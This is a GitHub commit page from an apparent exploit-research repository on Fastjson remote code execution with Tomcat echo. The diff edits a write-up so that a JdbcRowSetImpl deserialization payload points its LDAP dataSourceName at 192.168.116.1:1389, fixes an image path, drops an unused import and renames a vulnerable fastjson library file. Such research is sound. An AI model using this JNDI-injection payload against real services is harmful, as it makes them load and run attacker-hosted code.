Skip to content

Commit ac1d939

Browse files
committed
Fastjson
1 parent f676098 commit ac1d939

File tree

3 files changed

+6
-7
lines changed

3 files changed

+6
-7
lines changed

Rce_Echo/TomcatEcho/Fastjson回显.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -96,7 +96,7 @@
9696
},
9797
"b":{
9898
"@type":"com.sun.rowset.JdbcRowSetImpl",
99-
"dataSourceName":"ldap://127.0.0.1:1389/Cat",
99+
"dataSourceName":"ldap://192.168.116.1:1389/Cat",
100100
"autoCommit":"true"
101101
}
102102
}
@@ -106,7 +106,7 @@
106106
107107
4. 直接回显
108108
109-
![image-20210622174122630](D:/Blog/paper/pic/fastjson/1)
109+
![image-20210622174122630](D:/Blog/paper/pic/fastjson/11.png)
110110
111111
112112

Rce_Echo/TomcatEcho/src/main/java/summersec/echo/Controller/Fastjson.java

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,6 @@
88
import org.springframework.web.bind.annotation.RequestMethod;
99
import org.springframework.web.bind.annotation.ResponseBody;
1010

11-
import javax.servlet.http.HttpServletRequest;
1211
import java.net.URLDecoder;
1312

1413
/**

vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_47.xml renamed to vuldemo/.idea/libraries/Maven__com_alibaba_fastjson_1_2_30.xml

Lines changed: 4 additions & 4 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

0 commit comments

Comments
 (0)